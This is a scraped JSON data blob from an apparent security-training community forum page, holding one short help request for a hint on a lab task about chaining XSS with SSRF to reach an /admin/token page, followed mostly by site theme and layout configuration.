Exploitation","id":"message:506","revisionNum":1,"repliesCount":17,"author":{"__ref":"User:user:182"},"depth":0,"hasGivenKudo":false,"board":{"__ref":"Forum:board:help"},"conversation":{"__ref":"Conversation:conversation:506"},"readOnly":false,"editFrozen":false,"moderationData":{"__ref":"ModerationData:moderation_data:506"},"body":"

I was stuck in one question looking for HINT.

Extend the XSS vulnerability to view the contents of the /admin/token page with SSRF.

","body@stringLength":"144","rawBody":"

I was stuck in one question looking for HINT.

Extend the XSS vulnerability to view the contents of the /admin/token page with SSRF.

","kudosSumWeight":2,"postTime":"2024-09-20T01:31:22.555-07:00","images":{"__typename":"AssociatedImageConnection","edges":[],"totalCount":0,"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}},"attachments":{"__typename":"AttachmentConnection","pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null},"edges":[]},"tags":{"__typename":"TagConnection","pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null},"edges":[{"__typename":"TagEdge","cursor":"MjUuM3wyLjF8b3wxMHxfTlZffDE","node":{"__typename":"Tag","id":"tag:help & support","text":"help & support","time":"2024-05-28T08:30:37.542-07:00","lastActivityTime":null,"messagesCount":null,"followersCount":null}}]},"timeToRead":1,"currentRevision":{"__ref":"Revision:revision:506_1"},"latestVersion":null,"metrics":{"__typename":"MessageMetrics","views":948},"visibilityScope":"PUBLIC","canonicalUrl":null,"seoTitle":null,"seoDescription":null,"isEscalated":null,"placeholder":false,"originalMessageForPlaceholder":null,"messagePolicies":{"__typename":"MessagePolicies","canModerateSpamMessage":{"__typename":"PolicyResult","failureReason":{"__typename":"FailureReason","message":"error.lithium.policies.feature.moderation_spam.action.moderate_entity.allowed.accessDenied","key":"error.lithium.policies.feature.moderation_spam.action.moderate_entity.allowed.accessDenied","args":[]}}},"archivalData":null,"searchSnippet":"I was stuck in one question looking for HINT. Extend the XSS vulnerability to view the contents of the /admin/token page with SSRF.","replies":{"__typename":"MessageConnection","edges":[{"__typename":"MessageEdge","cursor":"MjUuM3wyLjF8b3wxMHwxNDowLDM5OjF8MQ","node":{"__ref":"ForumReplyMessage:message:511"}},{"__typename":"MessageEdge","cursor":"MjUuM3wyLjF8b3wxMHwxNDowLDM5OjF8Mg","node":{"__ref":"ForumReplyMessage:message:507"}},{"__typename":"MessageEdge","cursor":"MjUuM3wyLjF8b3wxMHwxNDowLDM5OjF8Mw","node":{"__ref":"ForumReplyMessage:message:523"}},{"__typename":"MessageEdge","cursor":"MjUuM3wyLjF8b3wxMHwxNDowLDM5OjF8NA","node":{"__ref":"ForumReplyMessage:message:539"}},{"__typename":"MessageEdge","cursor":"MjUuM3wyLjF8b3wxMHwxNDowLDM5OjF8NQ","node":{"__ref":"ForumReplyMessage:message:542"}},{"__typename":"MessageEdge","cursor":"MjUuM3wyLjF8b3wxMHwxNDowLDM5OjF8Ng","node":{"__ref":"ForumReplyMessage:message:544"}},{"__typename":"MessageEdge","cursor":"MjUuM3wyLjF8b3wxMHwxNDowLDM5OjF8Nw","node":{"__ref":"ForumReplyMessage:message:547"}},{"__typename":"MessageEdge","cursor":"MjUuM3wyLjF8b3wxMHwxNDowLDM5OjF8OA","node":{"__ref":"ForumReplyMessage:message:579"}},{"__typename":"MessageEdge","cursor":"MjUuM3wyLjF8b3wxMHwxNDowLDM5OjF8OQ","node":{"__ref":"ForumReplyMessage:message:589"}},{"__typename":"MessageEdge","cursor":"MjUuM3wyLjF8b3wxMHwxNDowLDM5OjF8MTA","node":{"__ref":"ForumReplyMessage:message:711"}}],"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}},"customFields":[]},"Conversation:conversation:506":{"__typename":"Conversation","id":"conversation:506","solved":true,"topic":{"__ref":"ForumTopicMessage:message:506"},"lastPostingActivityTime":"2024-10-10T07:16:41.480-07:00","lastPostTime":"2024-10-10T07:16:41.480-07:00","unreadReplyCount":17,"isSubscribed":false},"ModerationData:moderation_data:506":{"__typename":"ModerationData","id":"moderation_data:506","status":"APPROVED","rejectReason":null,"isReportedAbuse":false,"rejectUser":null,"rejectTime":null,"rejectActorType":"member"},"Revision:revision:506_1":{"__typename":"Revision","id":"revision:506_1","lastEditTime":"2024-09-20T01:31:22.555-07:00"},"CachedAsset:theme:customTheme1-1746142328682":{"__typename":"CachedAsset","id":"theme:customTheme1-1746142328682","value":{"id":"customTheme1","animation":{"fast":"150ms","normal":"250ms","slow":"500ms","slowest":"750ms","function":"cubic-bezier(0.07, 0.91, 0.51, 1)","__typename":"AnimationThemeSettings"},"avatar":{"borderRadius":"50%","collections":["custom"],"__typename":"AvatarThemeSettings"},"basics":{"browserIcon":{"imageAssetName":"67445c86d118f03d29f3e02f_Immersive_Favicon-1739352646053.png","imageLastModified":"1739352647623","__typename":"ThemeAsset"},"customerLogo":{"imageAssetName":"Community_Logo_-_Light-1739352757482.png","imageLastModified":"1739352759022","__typename":"ThemeAsset"},"maximumWidthOfPageContent":"1300px","oneColumnNarrowWidth":"800px","gridGutterWidthMd":"30px","gridGutterWidthXs":"10px","pageWidthStyle":"WIDTH_OF_BROWSER","__typename":"BasicsThemeSettings"},"buttons":{"borderRadiusSm":"3px","borderRadius":"3px","borderRadiusLg":"5px","paddingY":"5px","paddingYLg":"7px","paddingYHero":"var(--lia-bs-btn-padding-y-lg)","paddingX":"12px","paddingXLg":"16px","paddingXHero":"60px","fontStyle":"NORMAL","fontWeight":"400","textTransform":"NONE","disabledOpacity":0.5,"primaryTextColor":"var(--lia-bs-body-bg)","primaryTextHoverColor":"var(--lia-bs-body-bg)","primaryTextActiveColor":"var(--lia-bs-body-bg)","primaryBgColor":"var(--lia-bs-primary)","primaryBgHoverColor":"hsl(var(--lia-bs-primary-h), var(--lia-bs-primary-s), calc(var(--lia-bs-primary-l) * 0.85))","primaryBgActiveColor":"hsl(var(--lia-bs-primary-h), var(--lia-bs-primary-s), calc(var(--lia-bs-primary-l) * 0.7))","primaryBorder":"1px solid transparent","primaryBorderHover":"1px solid transparent","primaryBorderActive":"1px solid transparent","primaryBorderFocus":"1px solid var(--lia-bs-white)","primaryBoxShadowFocus":"0 0 0 1px var(--lia-bs-primary), 0 0 0 4px hsla(var(--lia-bs-primary-h), var(--lia-bs-primary-s), var(--lia-bs-primary-l), 0.2)","secondaryTextColor":"var(--lia-bs-body-color)","secondaryTextHoverColor":"hsl(var(--lia-bs-body-color-h), var(--lia-bs-body-color-s), calc(var(--lia-bs-body-color-l) * 0.95))","secondaryTextActiveColor":"hsl(var(--lia-bs-body-color-h), var(--lia-bs-body-color-s), calc(var(--lia-bs-body-color-l) * 0.9))","secondaryBgColor":"var(--lia-bs-body-bg)","secondaryBgHoverColor":"hsl(var(--lia-bs-body-bg-h), var(--lia-bs-body-bg-s), calc(var(--lia-bs-body-bg-l) * 0.96))","secondaryBgActiveColor":"hsl(var(--lia-bs-body-bg-h), var(--lia-bs-body-bg-s), calc(var(--lia-bs-body-bg-l) * 0.92))","secondaryBorder":"1px solid transparent","secondaryBorderHover":"1px solid transparent","secondaryBorderActive":"1px solid transparent","secondaryBorderFocus":"1px solid transparent","secondaryBoxShadowFocus":"0 0 0 1px var(--lia-bs-primary), 0 0 0 4px hsla(var(--lia-bs-primary-h), var(--lia-bs-primary-s), var(--lia-bs-primary-l), 0.2)","tertiaryTextColor":"var(--lia-bs-gray-900)","tertiaryTextHoverColor":"hsl(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s), calc(var(--lia-bs-gray-900-l) * 0.95))","tertiaryTextActiveColor":"hsl(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s), calc(var(--lia-bs-gray-900-l) * 0.9))","tertiaryBgColor":"transparent","tertiaryBgHoverColor":"transparent","tertiaryBgActiveColor":"hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l), 0.04)","tertiaryBorder":"1px solid transparent","tertiaryBorderHover":"1px solid hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l), 0.08)","tertiaryBorderActive":"1px solid transparent","tertiaryBorderFocus":"1px solid transparent","tertiaryBoxShadowFocus":"0 0 0 1px var(--lia-bs-primary), 0 0 0 4px hsla(var(--lia-bs-primary-h), var(--lia-bs-primary-s), var(--lia-bs-primary-l), 0.2)","destructiveTextColor":"var(--lia-bs-body-bg)","destructiveTextHoverColor":"var(--lia-bs-body-bg)","destructiveTextActiveColor":"var(--lia-bs-body-bg)","destructiveBgColor":"var(--lia-bs-danger)","destructiveBgHoverColor":"hsl(var(--lia-bs-danger-h), var(--lia-bs-danger-s), calc(var(--lia-bs-danger-l) * 0.85))","destructiveBgActiveColor":"hsl(var(--lia-bs-danger-h), var(--lia-bs-danger-s), calc(var(--lia-bs-danger-l) * 0.7))","destructiveBorder":"1px solid transparent","destructiveBorderHover":"1px solid transparent","destructiveBorderActive":"1px solid transparent","destructiveBorderFocus":"1px solid transparent","destructiveBoxShadowFocus":"0 0 0 1px var(--lia-bs-primary), 0 0 0 4px hsla(var(--lia-bs-primary-h), var(--lia-bs-primary-s), var(--lia-bs-primary-l), 0.2)","__typename":"ButtonsThemeSettings"},"border":{"color":"hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l), 0.08)","mainContent":"LIGHT","sideContent":"LIGHT","radiusSm":"6px","radius":"10px","radiusLg":"18px","radius50":"100vw","__typename":"BorderThemeSettings"},"boxShadow":{"xs":"0 0 0 1px hsla(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s), var(--lia-bs-gray-900-l), 0.08), 0 3px 0 -1px hsla(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s), var(--lia-bs-gray-900-l), 0.08)","sm":"0 2px 4px hsla(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s), var(--lia-bs-gray-900-l), 0.06)","md":"0 5px 15px hsla(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s), var(--lia-bs-gray-900-l), 0.15)","lg":"0 10px 30px hsla(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s), var(--lia-bs-gray-900-l), 0.15)","__typename":"BoxShadowThemeSettings"},"cards":{"bgColor":"var(--lia-panel-bg-color)","borderRadius":"var(--lia-panel-border-radius)","boxShadow":"var(--lia-box-shadow-xs)","__typename":"CardsThemeSettings"},"chip":{"maxWidth":"300px","height":"30px","__typename":"ChipThemeSettings"},"coreTypes":{"defaultMessageLinkColor":"var(--lia-bs-primary)","defaultMessageLinkDecoration":"none","defaultMessageLinkFontStyle":"NORMAL","defaultMessageLinkFontWeight":"400","defaultMessageFontStyle":"NORMAL","defaultMessageFontWeight":"400","defaultMessageFontFamily":"var(--lia-bs-font-family-base)","forumColor":"#26B5E6","forumFontFamily":"var(--lia-bs-font-family-base)","forumFontWeight":"var(--lia-default-message-font-weight)","forumLineHeight":"var(--lia-bs-line-height-base)","forumFontStyle":"var(--lia-default-message-font-style)","forumMessageLinkColor":"var(--lia-default-message-link-color)","forumMessageLinkDecoration":"var(--lia-default-message-link-decoration)","forumMessageLinkFontStyle":"var(--lia-default-message-link-font-style)","forumMessageLinkFontWeight":"var(--lia-default-message-link-font-weight)","forumSolvedColor":"#3CA7A1","blogColor":"#3CA7A1","blogFontFamily":"var(--lia-bs-font-family-base)","blogFontWeight":"var(--lia-default-message-font-weight)","blogLineHeight":"1.75","blogFontStyle":"var(--lia-default-message-font-style)","blogMessageLinkColor":"var(--lia-default-message-link-color)","blogMessageLinkDecoration":"var(--lia-default-message-link-decoration)","blogMessageLinkFontStyle":"var(--lia-default-message-link-font-style)","blogMessageLinkFontWeight":"var(--lia-default-message-link-font-weight)","tkbColor":"#6E6F7C","tkbFontFamily":"var(--lia-bs-font-family-base)","tkbFontWeight":"var(--lia-default-message-font-weight)","tkbLineHeight":"1.75","tkbFontStyle":"var(--lia-default-message-font-style)","tkbMessageLinkColor":"var(--lia-default-message-link-color)","tkbMessageLinkDecoration":"var(--lia-default-message-link-decoration)","tkbMessageLinkFontStyle":"var(--lia-default-message-link-font-style)","tkbMessageLinkFontWeight":"var(--lia-default-message-link-font-weight)","qandaColor":"#4099E2","qandaFontFamily":"var(--lia-bs-font-family-base)","qandaFontWeight":"var(--lia-default-message-font-weight)","qandaLineHeight":"var(--lia-bs-line-height-base)","qandaFontStyle":"var(--lia-default-message-link-font-style)","qandaMessageLinkColor":"var(--lia-default-message-link-color)","qandaMessageLinkDecoration":"var(--lia-default-message-link-decoration)","qandaMessageLinkFontStyle":"var(--lia-default-message-link-font-style)","qandaMessageLinkFontWeight":"var(--lia-default-message-link-font-weight)","qandaSolvedColor":"#3FA023","ideaColor":"#FF8000","ideaFontFamily":"var(--lia-bs-font-family-base)","ideaFontWeight":"var(--lia-default-message-font-weight)","ideaLineHeight":"var(--lia-bs-line-height-base)","ideaFontStyle":"var(--lia-default-message-font-style)","ideaMessageLinkColor":"var(--lia-default-message-link-color)","ideaMessageLinkDecoration":"var(--lia-default-message-link-decoration)","ideaMessageLinkFontStyle":"var(--lia-default-message-link-font-style)","ideaMessageLinkFontWeight":"var(--lia-default-message-link-font-weight)","contestColor":"#FCC845","contestFontFamily":"var(--lia-bs-font-family-base)","contestFontWeight":"var(--lia-default-message-font-weight)","contestLineHeight":"var(--lia-bs-line-height-base)","contestFontStyle":"var(--lia-default-message-link-font-style)","contestMessageLinkColor":"var(--lia-default-message-link-color)","contestMessageLinkDecoration":"var(--lia-default-message-link-decoration)","contestMessageLinkFontStyle":"ITALIC","contestMessageLinkFontWeight":"var(--lia-default-message-link-font-weight)","occasionColor":"#E45C65","occasionFontFamily":"var(--lia-bs-font-family-base)","occasionFontWeight":"var(--lia-default-message-font-weight)","occasionLineHeight":"var(--lia-bs-line-height-base)","occasionFontStyle":"var(--lia-default-message-font-style)","occasionMessageLinkColor":"var(--lia-default-message-link-color)","occasionMessageLinkDecoration":"var(--lia-default-message-link-decoration)","occasionMessageLinkFontStyle":"var(--lia-default-message-link-font-style)","occasionMessageLinkFontWeight":"var(--lia-default-message-link-font-weight)","grouphubColor":"#9AE8E8","categoryColor":"#949494","communityColor":"#FFFFFF","productColor":"#949494","__typename":"CoreTypesThemeSettings"},"colors":{"black":"#000000","white":"#FFFFFF","gray100":"#F7F7F7","gray200":"#F7F7F7","gray300":"#E8E8E8","gray400":"#D9D9D9","gray500":"#CCCCCC","gray600":"#949494","gray700":"#707070","gray800":"#545454","gray900":"#333333","dark":"#545454","light":"#F7F7F7","primary":"#4563FF","secondary":"#333333","bodyText":"#10122A","bodyBg":"#F9F9FA","info":"#26B5E6","success":"#3CA7A1","warning":"#FBDC55","danger":"#E45C65","alertSystem":"#FF6600","textMuted":"#707070","highlight":"#FFFCAD","outline":"var(--lia-bs-primary)","custom":["#26B5E6","#E45C65","#6E6F7C","#D7D5E2","#C69A70","#FBDC55","#9AE8E8","#3CA7A1"],"__typename":"ColorsThemeSettings"},"divider":{"size":"3px","marginLeft":"4px","marginRight":"4px","borderRadius":"50%","bgColor":"var(--lia-bs-gray-600)","bgColorActive":"var(--lia-bs-gray-600)","__typename":"DividerThemeSettings"},"dropdown":{"fontSize":"var(--lia-bs-font-size-sm)","borderColor":"var(--lia-bs-border-color)","borderRadius":"var(--lia-bs-border-radius-sm)","dividerBg":"var(--lia-bs-gray-300)","itemPaddingY":"5px","itemPaddingX":"20px","headerColor":"var(--lia-bs-gray-700)","__typename":"DropdownThemeSettings"},"email":{"link":{"color":"#0069D4","hoverColor":"#0061c2","decoration":"none","hoverDecoration":"underline","__typename":"EmailLinkSettings"},"border":{"color":"#e4e4e4","__typename":"EmailBorderSettings"},"buttons":{"borderRadiusLg":"5px","paddingXLg":"16px","paddingYLg":"7px","fontWeight":"700","primaryTextColor":"#ffffff","primaryTextHoverColor":"#ffffff","primaryBgColor":"#0069D4","primaryBgHoverColor":"#005cb8","primaryBorder":"1px solid transparent","primaryBorderHover":"1px solid transparent","__typename":"EmailButtonsSettings"},"panel":{"borderRadius":"5px","borderColor":"#e4e4e4","__typename":"EmailPanelSettings"},"__typename":"EmailThemeSettings"},"emoji":{"skinToneDefault":"#ffcd43","skinToneLight":"#fae3c5","skinToneMediumLight":"#e2cfa5","skinToneMedium":"#daa478","skinToneMediumDark":"#a78058","skinToneDark":"#5e4d43","__typename":"EmojiThemeSettings"},"heading":{"color":"var(--lia-bs-body-color)","fontFamily":"Inter","fontStyle":"NORMAL","fontWeight":"500","h1FontSize":"34px","h2FontSize":"32px","h3FontSize":"28px","h4FontSize":"24px","h5FontSize":"20px","h6FontSize":"16px","lineHeight":"1.3","subHeaderFontSize":"11px","subHeaderFontWeight":"500","h1LetterSpacing":"normal","h2LetterSpacing":"normal","h3LetterSpacing":"normal","h4LetterSpacing":"normal","h5LetterSpacing":"normal","h6LetterSpacing":"normal","subHeaderLetterSpacing":"2px","h1FontWeight":"var(--lia-bs-headings-font-weight)","h2FontWeight":"var(--lia-bs-headings-font-weight)","h3FontWeight":"var(--lia-bs-headings-font-weight)","h4FontWeight":"var(--lia-bs-headings-font-weight)","h5FontWeight":"var(--lia-bs-headings-font-weight)","h6FontWeight":"var(--lia-bs-headings-font-weight)","__typename":"HeadingThemeSettings"},"icons":{"size10":"10px","size12":"12px","size14":"14px","size16":"16px","size20":"20px","size24":"24px","size30":"30px","size40":"40px","size50":"50px","size60":"60px","size80":"80px","size120":"120px","size160":"160px","__typename":"IconsThemeSettings"},"imagePreview":{"bgColor":"var(--lia-bs-gray-900)","titleColor":"var(--lia-bs-white)","controlColor":"var(--lia-bs-white)","controlBgColor":"var(--lia-bs-gray-800)","__typename":"ImagePreviewThemeSettings"},"input":{"borderColor":"var(--lia-bs-gray-600)","disabledColor":"var(--lia-bs-gray-600)","focusBorderColor":"var(--lia-bs-primary)","labelMarginBottom":"10px","btnFontSize":"var(--lia-bs-font-size-sm)","focusBoxShadow":"0 0 0 3px hsla(var(--lia-bs-primary-h), var(--lia-bs-primary-s), var(--lia-bs-primary-l), 0.2)","checkLabelMarginBottom":"2px","checkboxBorderRadius":"3px","borderRadiusSm":"var(--lia-bs-border-radius-sm)","borderRadius":"var(--lia-bs-border-radius)","borderRadiusLg":"var(--lia-bs-border-radius-lg)","formTextMarginTop":"4px","textAreaBorderRadius":"var(--lia-bs-border-radius)","activeFillColor":"var(--lia-bs-primary)","__typename":"InputThemeSettings"},"loading":{"dotDarkColor":"hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l), 0.2)","dotLightColor":"hsla(var(--lia-bs-white-h), var(--lia-bs-white-s), var(--lia-bs-white-l), 0.5)","barDarkColor":"hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l), 0.06)","barLightColor":"hsla(var(--lia-bs-white-h), var(--lia-bs-white-s), var(--lia-bs-white-l), 0.4)","__typename":"LoadingThemeSettings"},"link":{"color":"var(--lia-bs-primary)","hoverColor":"hsl(var(--lia-bs-primary-h), var(--lia-bs-primary-s), calc(var(--lia-bs-primary-l) - 10%))","decoration":"none","hoverDecoration":"underline","__typename":"LinkThemeSettings"},"listGroup":{"itemPaddingY":"15px","itemPaddingX":"15px","borderColor":"var(--lia-bs-gray-300)","__typename":"ListGroupThemeSettings"},"modal":{"contentTextColor":"var(--lia-bs-body-color)","contentBg":"var(--lia-bs-white)","backgroundBg":"var(--lia-bs-black)","smSize":"440px","mdSize":"760px","lgSize":"1080px","backdropOpacity":0.3,"contentBoxShadowXs":"var(--lia-bs-box-shadow-sm)","contentBoxShadow":"var(--lia-bs-box-shadow)","headerFontWeight":"700","__typename":"ModalThemeSettings"},"navbar":{"position":"FIXED","background":{"attachment":null,"clip":null,"color":"var(--lia-bs-white)","imageAssetName":"","imageLastModified":"0","origin":null,"position":"CENTER_CENTER","repeat":"NO_REPEAT","size":"COVER","__typename":"BackgroundProps"},"backgroundOpacity":0.8,"paddingTop":"15px","paddingBottom":"15px","borderBottom":"1px solid var(--lia-bs-border-color)","boxShadow":"var(--lia-bs-box-shadow-sm)","brandMarginRight":"30px","brandMarginRightSm":"10px","brandLogoHeight":"30px","linkGap":"10px","linkJustifyContent":"flex-start","linkPaddingY":"5px","linkPaddingX":"10px","linkDropdownPaddingY":"9px","linkDropdownPaddingX":"var(--lia-nav-link-px)","linkColor":"var(--lia-bs-body-color)","linkHoverColor":"var(--lia-bs-primary)","linkFontSize":"var(--lia-bs-font-size-sm)","linkFontStyle":"NORMAL","linkFontWeight":"400","linkTextTransform":"NONE","linkLetterSpacing":"normal","linkBorderRadius":"var(--lia-bs-border-radius-sm)","linkBgColor":"transparent","linkBgHoverColor":"transparent","linkBorder":"none","linkBorderHover":"none","linkBoxShadow":"none","linkBoxShadowHover":"none","linkTextBorderBottom":"none","linkTextBorderBottomHover":"none","dropdownPaddingTop":"10px","dropdownPaddingBottom":"15px","dropdownPaddingX":"10px","dropdownMenuOffset":"2px","dropdownDividerMarginTop":"10px","dropdownDividerMarginBottom":"10px","dropdownBorderColor":"hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l), 0.08)","controllerBgHoverColor":"hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l), 0.1)","controllerIconColor":"var(--lia-bs-body-color)","controllerIconHoverColor":"var(--lia-bs-body-color)","controllerTextColor":"var(--lia-nav-controller-icon-color)","controllerTextHoverColor":"var(--lia-nav-controller-icon-hover-color)","controllerHighlightColor":"hsla(30, 100%, 50%)","controllerHighlightTextColor":"var(--lia-yiq-light)","controllerBorderRadius":"var(--lia-border-radius-50)","hamburgerColor":"var(--lia-nav-controller-icon-color)","hamburgerHoverColor":"var(--lia-nav-controller-icon-color)","hamburgerBgColor":"transparent","hamburgerBgHoverColor":"transparent","hamburgerBorder":"none","hamburgerBorderHover":"none","collapseMenuMarginLeft":"20px","collapseMenuDividerBg":"var(--lia-nav-link-color)","collapseMenuDividerOpacity":0.16,"__typename":"NavbarThemeSettings"},"pager":{"textColor":"var(--lia-bs-link-color)","textFontWeight":"var(--lia-font-weight-md)","textFontSize":"var(--lia-bs-font-size-sm)","__typename":"PagerThemeSettings"},"panel":{"bgColor":"var(--lia-bs-white)","borderRadius":"var(--lia-bs-border-radius)","borderColor":"var(--lia-bs-border-color)","boxShadow":"none","__typename":"PanelThemeSettings"},"popover":{"arrowHeight":"8px","arrowWidth":"16px","maxWidth":"300px","minWidth":"100px","headerBg":"var(--lia-bs-white)","borderColor":"var(--lia-bs-border-color)","borderRadius":"var(--lia-bs-border-radius)","boxShadow":"0 0.5rem 1rem hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l), 0.15)","__typename":"PopoverThemeSettings"},"prism":{"color":"#000000","bgColor":"#f5f2f0","fontFamily":"var(--font-family-monospace)","fontSize":"var(--lia-bs-font-size-base)","fontWeightBold":"var(--lia-bs-font-weight-bold)","fontStyleItalic":"italic","tabSize":2,"highlightColor":"#b3d4fc","commentColor":"#62707e","punctuationColor":"#6f6f6f","namespaceOpacity":"0.7","propColor":"#990055","selectorColor":"#517a00","operatorColor":"#906736","operatorBgColor":"hsla(0, 0%, 100%, 0.5)","keywordColor":"#0076a9","functionColor":"#d3284b","variableColor":"#c14700","__typename":"PrismThemeSettings"},"rte":{"bgColor":"var(--lia-bs-white)","borderRadius":"var(--lia-panel-border-radius)","boxShadow":" var(--lia-panel-box-shadow)","customColor1":"#bfedd2","customColor2":"#fbeeb8","customColor3":"#f8cac6","customColor4":"#eccafa","customColor5":"#c2e0f4","customColor6":"#2dc26b","customColor7":"#f1c40f","customColor8":"#e03e2d","customColor9":"#b96ad9","customColor10":"#3598db","customColor11":"#169179","customColor12":"#e67e23","customColor13":"#ba372a","customColor14":"#843fa1","customColor15":"#236fa1","customColor16":"#ecf0f1","customColor17":"#ced4d9","customColor18":"#95a5a6","customColor19":"#7e8c8d","customColor20":"#34495e","customColor21":"#000000","customColor22":"#ffffff","defaultMessageHeaderMarginTop":"40px","defaultMessageHeaderMarginBottom":"20px","defaultMessageItemMarginTop":"0","defaultMessageItemMarginBottom":"30px","diffAddedColor":"hsla(170, 53%, 51%, 0.4)","diffChangedColor":"hsla(43, 97%, 63%, 0.4)","diffNoneColor":"hsla(0, 0%, 80%, 0.4)","diffRemovedColor":"hsla(9, 74%, 47%, 0.4)","specialMessageHeaderMarginTop":"40px","specialMessageHeaderMarginBottom":"20px","specialMessageItemMarginTop":"0","specialMessageItemMarginBottom":"30px","__typename":"RteThemeSettings"},"tags":{"bgColor":"var(--lia-bs-gray-200)","bgHoverColor":"var(--lia-bs-gray-400)","borderRadius":"var(--lia-bs-border-radius-sm)","color":"var(--lia-bs-body-color)","hoverColor":"var(--lia-bs-body-color)","fontWeight":"var(--lia-font-weight-md)","fontSize":"var(--lia-font-size-xxs)","textTransform":"UPPERCASE","letterSpacing":"0.5px","__typename":"TagsThemeSettings"},"toasts":{"borderRadius":"var(--lia-bs-border-radius)","paddingX":"12px","__typename":"ToastsThemeSettings"},"typography":{"fontFamilyBase":"Inter","fontStyleBase":"NORMAL","fontWeightBase":"300","fontWeightLight":"300","fontWeightNormal":"400","fontWeightMd":"500","fontWeightBold":"700","letterSpacingSm":"normal","letterSpacingXs":"normal","lineHeightBase":"1.5","fontSizeBase":"16px","fontSizeXxs":"11px","fontSizeXs":"12px","fontSizeSm":"14px","fontSizeLg":"20px","fontSizeXl":"24px","smallFontSize":"14px","customFonts":[{"source":"GOOGLE","name":"Geologica","styles":[{"style":"NORMAL","weight":"100","__typename":"FontStyleData"},{"style":"NORMAL","weight":"500","__typename":"FontStyleData"}],"assetNames":["Geologica-normal-100.woff2","Geologica-normal-500.woff2"],"__typename":"CustomFont"}],"__typename":"TypographyThemeSettings"},"unstyledListItem":{"marginBottomSm":"5px","marginBottomMd":"10px","marginBottomLg":"15px","marginBottomXl":"20px","marginBottomXxl":"25px","__typename":"UnstyledListItemThemeSettings"},"yiq":{"light":"#ffffff","dark":"#000000","__typename":"YiqThemeSettings"},"colorLightness":{"primaryDark":0.36,"primaryLight":0.74,"primaryLighter":0.89,"primaryLightest":0.95,"infoDark":0.39,"infoLight":0.72,"infoLighter":0.85,"infoLightest":0.93,"successDark":0.24,"successLight":0.62,"successLighter":0.8,"successLightest":0.91,"warningDark":0.39,"warningLight":0.68,"warningLighter":0.84,"warningLightest":0.93,"dangerDark":0.41,"dangerLight":0.72,"dangerLighter":0.89,"dangerLightest":0.95,"__typename":"ColorLightnessThemeSettings"},"localOverride":false,"__typename":"Theme"},"localOverride":false},"CachedAsset:text:en_US-shared/client/components/common/Loading/LoadingDot-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-shared/client/components/common/Loading/LoadingDot-1746024986000","value":{"title":"Loading..."},"localOverride":false},"CachedAsset:quilt:immersivelabs.prod:pages/forums/ForumMessagePage:board:help-1746142327027":{"__typename":"CachedAsset","id":"quilt:immersivelabs.prod:pages/forums/ForumMessagePage:board:help-1746142327027","value":{"id":"ForumMessagePage","container":{"id":"Common","headerProps":{"backgroundImageProps":null,"backgroundColor":null,"addComponents":null,"removeComponents":["community.widget.bannerWidget"],"componentOrder":null,"__typename":"QuiltContainerSectionProps"},"headerComponentProps":{"community.widget.breadcrumbWidget":{"disableLastCrumbForDesktop":false}},"footerProps":null,"footerComponentProps":null,"items":[{"id":"message-list","layout":"MAIN_SIDE","bgColor":null,"showTitle":null,"showDescription":null,"textPosition":null,"textColor":null,"sectionEditLevel":null,"bgImage":null,"disableSpacing":null,"edgeToEdgeDisplay":null,"fullHeight":null,"showBorder":null,"__typename":"MainSideQuiltSection","columnMap":{"main":[{"id":"messages.widget.topicWithThreadedReplyListWidget","className":"lia-topic-with-replies","props":{"editLevel":"CONFIGURE"},"__typename":"QuiltComponent"}],"side":[{"id":"featuredWidgets.widget.featuredPlacesWidget","className":null,"props":{"instanceId":"featuredWidgets.widget.featuredPlacesWidget-1717580201341","layoutProps":{"layout":"card","cardSize":"xs","layoutOptions":{"useNodeDescription":false,"useUnreadMessagesCount":false,"useChildNodes":false,"useNodeTopicsCount":false,"useNodeAvatar":false,"useNodeLatestActivityTime":false},"textAlignment":"center","descriptionClampLines":1},"titleSrOnly":true,"showPager":false,"pageSize":1,"lazyLoad":false},"__typename":"QuiltComponent"},{"id":"messages.widget.relatedContentWidget","className":null,"props":{"hideIfEmpty":false,"enablePagination":true,"useTitle":true,"listVariant":{"type":"unstyled","props":{"listItemSpacing":"xxl"}},"pageSize":5,"style":"compact","pagerVariant":{"type":"loadMore"},"viewVariant":{"type":"inline","props":{"useRepliesCount":false,"useMedia":false,"useAuthorRank":false,"useNode":false,"boardIconSize":"24","useAuthorLoginLink":true,"useNodeLink":true,"usePreviewMedia":true,"timeStampType":"postTime","useTextBody":true,"useSolvedBadge":false,"subjectAs":"h6","renderPostTimeBeforeAuthor":true,"useAvatar":false,"useVideoPreview":false,"portraitClampBodyLines":3,"useCompactSpacing":true,"useTimeToRead":false,"useSpoilerFreeBody":true,"useKudosCount":false,"useViewCount":false,"useBody":false,"useTags":false,"clampSubjectLines":1,"useBoardIcon":false,"useMessageTimeLink":true,"useAuthorLogin":true}},"lazyLoad":false,"panelType":"standard"},"__typename":"QuiltComponent"},{"id":"messages.widget.messageListForNodeByRecentActivityWidget","className":null,"props":{"hideIfEmpty":true,"useTitle":true,"addTags":false,"titleContextVariant":"other","showTabs":false,"pageSize":5,"pagerVariant":{"type":"loadMore"},"style":"compact","viewVariant":{"type":"inline","props":{"useRepliesCount":false,"useMedia":false,"useAuthorRank":false,"useNode":false,"boardIconSize":"24","tr